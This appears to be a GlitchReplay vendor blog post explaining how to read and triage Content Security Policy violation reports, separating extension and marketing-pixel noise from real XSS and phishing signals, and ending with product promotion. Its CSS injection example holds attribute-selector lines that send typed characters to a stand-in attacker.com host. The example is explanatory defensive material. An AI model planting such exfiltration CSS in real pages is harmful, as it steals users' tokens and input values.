CSP violation reports: what they're trying to tell you

A field guide to the most common violated-directive values, which ones are real attacks, and which ones are just your marketing team adding a pixel.

GlitchReplay team··
cspsecurity

You finally deploy a strict Content Security Policy to production. It's a big milestone for the security posture of your app. You've moved past the "Report-Only" phase and you're ready to actually block the bad stuff. Within ten minutes, your error tracker is flooded with 10,000 "violations." Your phone starts buzzing. Your first instinct is to panic—are you under a massive, coordinated XSS attack? Did a supply chain compromise just hit your frontend?

Then you take a breath and look at the blocked-uri. You see chrome-extension:// and google-analytics.com and safari-extension://. You haven't been hacked. You've just hit the "CSP Noise Wall."

Most developers treat CSP reports as "security spam" because they are incredibly noisy and often triggered by things the developer has zero control over. But buried inside that noise are the actual signals that tell you when a user is being phished or when a malicious script is trying to scrape your checkout page. This post is a decoder ring for those JSON payloads, designed to help you distinguish between a marketing team's new tracking pixel and a genuine security threat.

The Anatomy of a Violation: Reading the JSON

CSP reports aren't just generic error messages; they are structured telemetry. To triage them effectively, you need to understand the keys in the JSON object. The browser sends these reports as a POST request with a application/csp-report content type (or application/reports+json for modern reporting), and the structure tells a very specific story.

violated-directive vs. effective-directive

The violated-directive is the literal string from your policy that was broken—for example, script-src 'self' https://trusted.com. However, the effective-directive is often more useful for debugging. If you have a broad default-src policy but haven't defined a font-src, a blocked font will show default-src as the violated directive, but font-src as the effective one. This tells you exactly which specific sub-policy you need to adjust.

blocked-uri vs. source-file

This is where most of the confusion happens. The blocked-uri is the resource that the browser refused to load. The source-file (or document-uri) is the page where the violation occurred. If the blocked-uri is something like https://malicious-attacker.net/logger.php, you have a problem. If the blocked-uri is about:blank or inline, it means someone tried to inject a script directly into the HTML, which is a classic XSS pattern—but also a classic browser extension pattern.

The legacy report-uri vs. the modern report-to

We are currently in a transition period for CSP reporting. The legacy report-uri directive sends a single JSON object wrapped in a csp-report key. The modern report-to (part of the Reporting API) sends an array of objects that can include CSP violations, crash reports, and deprecation warnings. Here is what they look like side-by-side:

{
  "csp-report": {
    "document-uri": "https://glitchreplay.com/checkout",
    "referrer": "https://google.com/",
    "violated-directive": "script-src-elem",
    "effective-directive": "script-src-elem",
    "original-policy": "default-src 'self'; script-src 'self'; report-uri /api/csp-report",
    "disposition": "enforce",
    "blocked-uri": "https://evil.com/malware.js",
    "line-number": 42,
    "column-number": 12,
    "source-file": "https://glitchreplay.com/static/js/main.js",
    "status-code": 200,
    "script-sample": ""
  }
}

Notice the disposition field. In "Report-Only" mode, this will be report. In "Enforce" mode, it will be enforce. If you see enforce and the site is still working, it means your policy is successfully blocking something that shouldn't be there anyway.

Tier 1 Noise: The "Ghost" Violations (Extensions & Plugins)

The single largest source of CSP noise comes from the user's own browser. Tools like Grammarly, LastPass, Honey, and various ad-blockers work by injecting scripts and styles into every page the user visits. Since your CSP doesn't (and shouldn't) whitelist grammarly.com or chrome-extension://..., the browser dutifully reports these as violations.

Why extensions trigger violations

When an extension wants to check your spelling or auto-fill a password, it often injects a <script> tag or an <iframe> into the DOM. Even if the extension is "trusted" by the user, the browser sees an external resource trying to execute in the context of your origin. Since your policy says "only load scripts from my own domain," the browser blocks it and sends you a report.

Identifying extension patterns

You can identify these "Ghost" violations by looking at the URI schemes in the blocked-uri field:

  • chrome-extension:// (Chrome)
  • moz-extension:// (Firefox)
  • safari-extension:// (Safari)
  • resource:// (Firefox internal)

If you see these, you can safely ignore them. You cannot fix them by changing your policy, and attempting to whitelist every possible extension ID is a fool's errand. A good error tracker should allow you to filter these out before they even hit your alert threshold.

The "Injected Script" problem

Often, you'll see script-src violations where the blocked-uri is about:blank or just inline. This is the hardest noise to triage because it's exactly what a real XSS attack looks like. However, if the source-file is also about:blank, or if the report occurs across thousands of users with no common pattern, it's almost certainly a browser plugin "cleaning up" the DOM or injecting a helper script. We recommend ignoring script-src violations where the blocked-uri is about:blank unless you are seeing a massive spike on a specific sensitive page.

Tier 2 Noise: The "Marketing Pixel" Surprise

Shadow IT is the second biggest contributor to CSP noise. Marketing teams love Tag Managers (GTM, Adobe Launch, etc.). They can add a new Facebook, TikTok, or LinkedIn tracking pixel with two clicks in a web UI, completely bypassing the engineering team's pull request process.

Suddenly, your connect-src or img-src policy is being violated because a new pixel is trying to send data to a domain you've never heard of. This isn't a "security" threat in the traditional sense, but it is a policy violation that can break marketing attribution.

The img-src data-URI explosion

Many tracking pixels use 1x1 transparent GIFs to exfiltrate data. They encode event data into the query string of the image URL. If your img-src policy is strict, these will be blocked. You might also see data: URIs being blocked. While data: URIs are often used for small icons, they can also be used to execute scripts or exfiltrate data, which is why many security-conscious teams block them by default.

Distinguishing legit marketing from exfiltration

How do you know if https://analytics-gateway.xyz/v1/event is your marketing team or an attacker? 1. Check the document-uri: Is this happening on the blog or the credit card entry page? 2. Search your codebase: Is there a GTM container ID that might be loading this? 3. Look at the volume: Malicious exfiltration is usually targeted or happens in a sudden burst. Marketing noise is constant and correlates with your traffic volume.

The "Real" Threats: Spotting XSS and Data Exfiltration

Once you've filtered out Grammarly and the Facebook pixel, what's left? This is the "Signal" you've been looking for. Real threats usually manifest in a few specific ways.

Unknown third-party domains in script-src

If you see a violation for a script from a domain like https://cdn-static-js.com/jquery.min.js (and you don't use that CDN), that is a high-priority event. Attackers often use domains that look "boring" or "technical" to hide in the noise. This could indicate a stored XSS where an attacker has successfully injected a script tag into a database field that is being rendered on your page.

form-action violations: The hallmark of phishing

This is one of the most underrated CSP directives. form-action limits where <form> data can be submitted. An attacker who has gained partial control of your DOM might not be able to execute JS (thanks to your script-src), but they might be able to change the action attribute of your login form to https://attacker-phish.com/collect. If you see a form-action violation, investigate it immediately. It is almost never caused by a browser extension.

style-src and CSS Injection

Many people think style-src 'unsafe-inline' is harmless. It's just CSS, right? Wrong. Modern CSS is powerful enough to exfiltrate data. By using attribute selectors and background images, an attacker can steal CSRF tokens or sensitive input values. For example:

input[value^="a"] { background-image: url("https://attacker.com/log?char=a"); }
input[value^="b"] { background-image: url("https://attacker.com/log?char=b"); }

As the user types, the browser requests different background images, effectively logging every keystroke to the attacker's server. A CSP report for an unauthorized stylesheet or a style-src violation with an external blocked-uri should be treated with the same severity as a script violation.

Deciphering the "Eval" and "Inline" Headache

The most common directives you'll see in violations are 'unsafe-inline' and 'unsafe-eval'. These are the two biggest holes in any CSP, and closing them is difficult because modern web development relies on them heavily.

Hydration and Next.js/Vue

Modern frameworks like Next.js often trigger script-src 'self' violations during the "hydration" process. This happens when the server-rendered HTML contains inline scripts for state management (like __NEXT_DATA__). If you haven't configured nonces or hashes correctly, the browser will block these scripts, and your app will lose its interactivity (the "uncanny valley" of web apps where it looks loaded but nothing clicks).

The "Refactored to Death" scenario

Sometimes a library update will suddenly start using WebAssembly.instantiate() or new Function(), which requires 'wasm-eval' or 'unsafe-eval'. If you see a sudden spike in violations after a deployment, check your package-lock.json. You might have accidentally pulled in a dependency that requires more permissions than your policy allows.

Using nonces and hashes: A better alternative

Instead of using 'unsafe-inline', you should use nonces (number used once) or cryptographic hashes. A nonce is a random string generated for every request and added to both the CSP header and the script tag. This allows specific inline scripts to run while blocking any injected ones. If you see a violation for an inline script that *should* be running, check if your nonce is being correctly passed through your middleware to the template. You can read more about this in the Google Security Blog's guide to CSP nonces.

Triage Workflow: From Alert to Resolution

When you're an SRE on call and you get a CSP alert, don't just ignore it. Follow this 4-step workflow to triage the noise effectively.

Step 1: Is the blocked-uri a known-good domain? Check it against a list of common extension schemes and your own marketing stack. If it's chrome-extension://, log it as noise and move on.

Step 2: Check the document-uri. Does this happen on /blog or /api/v1/checkout/confirm? A violation on a sensitive page is 10x more important than one on a public landing page. Use the importance of the page to weight the priority of the alert.

Step 3: Correlation. This is the most critical step. Use a tool like GlitchReplay to look at the session replay associated with the violation. When the CSP report was fired, what was the user doing? If they were just sitting there and a dozen about:blank scripts tried to fire, it's an extension. If the violation fired exactly when they clicked "Submit Order," you might have a real problem with a malicious script intercepting that action.

Step 4: Update vs. Ignore. If the violation is legitimate (e.g., the marketing team added a new tool), update your CSP header. If it's noise, add it to your error tracker's ignore list so it doesn't wake you up at 2 AM again.

How GlitchReplay Handles the Noise

At GlitchReplay, we built our CSP reporting endpoint specifically to solve the "Noise Wall" problem. Most error trackers (including Sentry) treat every CSP report as an individual "event" that counts against your monthly quota. If you get hit with a wave of extension noise, you could find yourself with a $500 bill just for "learning" that your users like Grammarly.

Grouping identical violations

We use sophisticated fingerprinting to group CSP violations. Instead of 10,000 individual errors, we show you one issue: "Grammarly Extension Violation" with a counter. We look at the violated-directive, the blocked-uri, and the source-file to ensure that noise is consolidated, while actual security signals remain distinct. You can read more about our approach in our post on error fingerprinting and deduplication.

Flat-rate pricing: No "Noise Tax"

Because we built GlitchReplay on a modern Cloudflare stack, our costs are significantly lower than legacy trackers. We offer flat-rate pricing, which means you can ingest 100k noise-heavy CSP reports without worrying about your bill. We believe you shouldn't be "fined" by your tooling just because your security policy is doing its job. Compare this to other providers in our pricing breakdown.

Integrating CSP with Replay

The biggest advantage of using GlitchReplay is the context. When a CSP violation occurs, we link it directly to the session replay. You can see the exact UI state, the console logs, and the network requests at the moment of the violation. This makes triaging "is it an XSS attack or just an extension?" a 10-second task instead of a 2-hour investigation. By seeing the actual DOM when the violation occurred, you can rule out false positives with 100% confidence.

Stop paying per-event "penalties" for CSP noise. Switch to GlitchReplay's Sentry-compatible endpoint and get the full session context for every security violation. Your SRE team (and your CFO) will thank you.

Stop watching your error bill spike.

GlitchReplay is Sentry-SDK compatible, includes session replay and security signals, and never charges per event. Free to start, five minutes to first event.